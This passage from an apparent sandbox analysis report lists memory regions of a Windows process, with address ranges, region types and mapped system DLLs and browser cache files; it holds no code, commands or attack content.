"\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 666 start_va = 0x75170000 end_va = 0x751b4fff entry_point = 0x75170000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 667 start_va = 0x751c0000 end_va = 0x751c9fff entry_point = 0x751c0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 668 start_va = 0x754f0000 end_va = 0x75516fff entry_point = 0x754f0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 669 start_va = 0x75520000 end_va = 0x755aefff entry_point = 0x75520000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 670 start_va = 0x755d0000 end_va = 0x7567bfff entry_point = 0x755d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 671 start_va = 0x75780000 end_va = 0x757d6fff entry_point = 0x75780000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 672 start_va = 0x757e0000 end_va = 0x758cffff entry_point = 0x757e0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 673 start_va = 0x758d0000 end_va = 0x758dbfff entry_point = 0x758d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 674 start_va = 0x75cf0000 end_va = 0x76939fff entry_point = 0x75cf0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 675 start_va = 0x76b20000 end_va = 0x76baffff entry_point = 0x76b20000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 676 start_va = 0x76c40000 end_va = 0x76c58fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 677 start_va = 0x76cf0000 end_va = 0x76e0cfff entry_point = 0x76cf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 678 start_va = 0x76e10000 end_va = 0x76f0ffff entry_point = 0x76e10000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 679 start_va = 0x76f10000 end_va = 0x76faffff entry_point = 0x76f10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 680 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 681 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 682 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 683 start_va = 0x820000 end_va = 0x9a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 684 start_va = 0x752e0000 end_va = 0x753abfff entry_point = 0x752e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 685 start_va = 0x75b40000 end_va = 0x75b9ffff entry_point = 0x75b40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 686 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 687 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 688 start_va = 0x9b0000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 689 start_va = 0xb40000 end_va = 0x1f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 690 start_va = 0x1f40000 end_va = 0x220efff entry_point = 0x1f40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 691 start_va = 0x74ab0000 end_va = 0x74acafff entry_point = 0x74ab0000 region_type = mapped_file name = "eappgnui.dll" filename = "\\Windows\\SysWOW64\\eappgnui.dll" (normalized: "c:\\windows\\syswow64\\eappgnui.dll") Region: id = 692 start_va = 0x2210000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 725 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 726 start_va = 0x6d0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 727 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 728 start_va = 0x2330000 end_va = 0x2330fff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 729 start_va = 0x23d0000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 730 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 731 start_va = 0x310000 end_va = 0x391fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 732 start_va = 0x74a90000 end_va = 0x74aa1fff entry_point = 0x74a90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 733 start_va = 0x75ba0000 end_va = 0x75c94fff entry_point = 0x75ba0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 734 start_va = 0x753b0000 end_va = 0x754e5fff entry_point = 0x753b0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 735 start_va = 0x758e0000 end_va = 0x75adafff entry_point = 0x758e0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 736 start_va = 0x74a70000 end_va = 0x74a80fff entry_point = 0x74a70000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 737 start_va = 0x74dd0000 end_va = 0x74dd8fff entry_point = 0x74dd0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 738 start_va = 0x74a50000 end_va = 0x74a68fff entry_point = 0x74a50000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 739 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 740 start_va = 0x74a30000 end_va = 0x74a38fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 741 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 742 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 743 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 767 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 768 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 769 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 770 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 771 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 772 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 773 start_va = 0x749d0000 end_va = 0x74a0afff entry_point = 0x749d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 774 start_va = 0x749a0000 end_va = 0x749c0fff entry_point = 0x749a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 775 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 776 start_va = 0x4e0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 777 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 778 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 779 start_va = 0x738c0000 end_va = 0x7393ffff entry_point = 0x738c0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 780 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 781 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 782 start_va = 0x2410000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 783 start_va = 0x2210000 end_va = 0x22eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002210000" filename = "" Region: id = 784 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 785 start_va = 0x74720000 end_va = 0x748bdfff entry_point = 0x74720000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 786 start_va = 0x280000 end_va = 0x280fff entry_point = 0x280000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 787 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 788 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 789 start_va = 0x74990000 end_va = 0x7499afff entry_point = 0x74990000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 790 start_va = 0x3f0000 end_va = 0x3fbfff entry_point = 0x3f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 791 start_va = 0x560000 end_va = 0x567fff entry_point = 0x560000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 792 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x5c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 793 start_va = 0x76ae0000 end_va = 0x76b14fff entry_point = 0x76ae0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 794 start_va = 0x77380000 end_va = 0x77385fff entry_point = 0x77380000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 795 start_va = 0x2580000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 796 start_va = 0x74940000 end_va = 0x74983fff entry_point = 0x74940000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 797 start_va = 0x2340000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 798 start_va = 0x74920000 end_va = 0x7493bfff entry_point = 0x74920000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 799 start_va = 0x74910000 end_va = 0x74916fff entry_point = 0x74910000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 800 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 801 start_va = 0x22f0000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 802 start_va = 0x746c0000 end_va = 0x74711fff entry_point = 0x746c0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 803 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 804 start_va = 0x748f0000 end_va = 0x74904fff entry_point = 0x748f0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 805 start_va = 0x748e0000 end_va = 0x748ecfff entry_point = 0x748e0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 806 start_va = 0x2410000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 807 start_va = 0x2450000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 808 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 809 start_va = 0x2580000 end_va = 0x267ffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 810 start_va = 0x2760000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 811 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 812 start_va = 0x2340000 end_va = 0x2340fff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 813 start_va = 0x2360000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 814 start_va = 0x2340000 end_va = 0x2340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 815 start_va = 0x748d0000 end_va = 0x748d5fff entry_point = 0x748d0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 816 start_va = 0x746b0000 end_va = 0x746bffff entry_point = 0x746b0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 817 start_va = 0x2490000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 818 start_va = 0x23a0000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 819 start_va = 0x27a0000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 820 start_va = 0x746a0000 end_va = 0x746a5fff entry_point = 0x746a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 821 start_va = 0x74660000 end_va = 0x7469bfff entry_point = 0x74660000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 822 start_va = 0x27a0000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 823 start_va = 0x74650000 end_va = 0x74654fff entry_point = 0x74650000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 824 start_va = 0x2350000 end_va = 0x2356fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002350000" filename = "" Region: id = 825 start_va = 0x23a0000 end_va = 0x23a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023a0000" filename = "" Region: id = 826 start_va = 0x23c0000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 827 start_va = 0x2490000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 828 start_va = 0x24d0000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 829 start_va = 0x24e0000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 830 start_va = 0x28a0000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 831 start_va = 0x29a0000 end_va = 0x2d92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029a0000" filename = "" Region: id = 832 start_va = 0x74640000 end_va = 0x74647fff entry_point = 0x74640000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 833 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 834 start_va = 0x74610000 end_va = 0x74638fff entry_point = 0x74610000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 835 start_va = 0x745f0000 end_va = 0x74603fff entry_point = 0x745f0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 836 start_va = 0x745d0000 end_va = 0x745e6fff entry_point = 0x745d0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 837 start_va = 0x745c0000 end_va = 0x745c7fff entry_point = 0x745c0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 838 start_va = 0x745b0000 end_va = 0x745bafff entry_point = 0x745b0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 839 start_va = 0x745a0000 end_va = 0x745acfff entry_point = 0x745a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 840 start_va = 0x2680000 end_va = 0x273ffff entry_point = 0x2680000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 841 start_va = 0x27a0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 842 start_va = 0x27e0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 843 start_va = 0x2860000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 844 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 845 start_va = 0x743d0000 end_va = 0x744e5fff entry_point = 0x743d0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 846 start_va = 0x74590000 end_va = 0x7459ffff entry_point = 0x74590000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 847 start_va = 0x23b0000 end_va = 0x23b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023b0000" filename = "" Region: id = 848 start_va = 0x76c60000 end_va = 0x76ce2fff entry_point = 0x76c60000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 849 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002520000" filename = "" Region: id = 850 start_va = 0x74470000 end_va = 0x744ecfff entry_point = 0x74470000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 851 start_va = 0x74570000 end_va = 0x7459efff entry_point = 0x74570000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 852 start_va = 0x2740000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 853 start_va = 0x2da0000 end_va = 0x2f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 854 start_va = 0x2f50000 end_va = 0x387ffff entry_point = 0x2f50000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 855 start_va = 0x3880000 end_va = 0x3c0cfff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 856 start_va = 0x3c10000 end_va = 0x3f9cfff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 857 start_va = 0x74560000 end_va = 0x74565fff entry_point = 0x74560000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\SysWOW64\\IconCodecService.dll" (normalized: "c:\\windows\\syswow64\\iconcodecservice.dll") Region: id = 858 start_va = 0x743f0000 end_va = 0x744eafff entry_point = 0x743f0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 859 start_va = 0x27a0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 860 start_va = 0x23b0000 end_va = 0x23b0fff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 861 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 862 start_va = 0x3c10000 end_va = 0x3f9cfff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 931 start_va = 0x2820000 end_va = 0x285ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 932 start_va = 0x2da0000 end_va = 0x2ddffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 933 start_va = 0x2f10000 end_va = 0x2f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 934 start_va = 0x742f0000 end_va = 0x743e4fff entry_point = 0x742f0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 935 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 936 start_va = 0x2de0000 end_va = 0x2de1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002de0000" filename = "" Region: id = 937 start_va = 0x2df0000 end_va = 0x2df0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 938 start_va = 0x2e00000 end_va = 0x2e03fff entry_point = 0x2e00000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 939 start_va = 0x2e10000 end_va = 0x2e2efff entry_point = 0x2e10000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 940 start_va = 0x2e30000 end_va = 0x2e30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e30000" filename = "" Region: id = 941 start_va = 0x2e40000 end_va = 0x2e6ffff entry_point = 0x2e40000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 942 start_va = 0x2e70000 end_va = 0x2e73fff entry_point = 0x2e70000 region_type = mapped_file name = "cversions.2.db" filename = 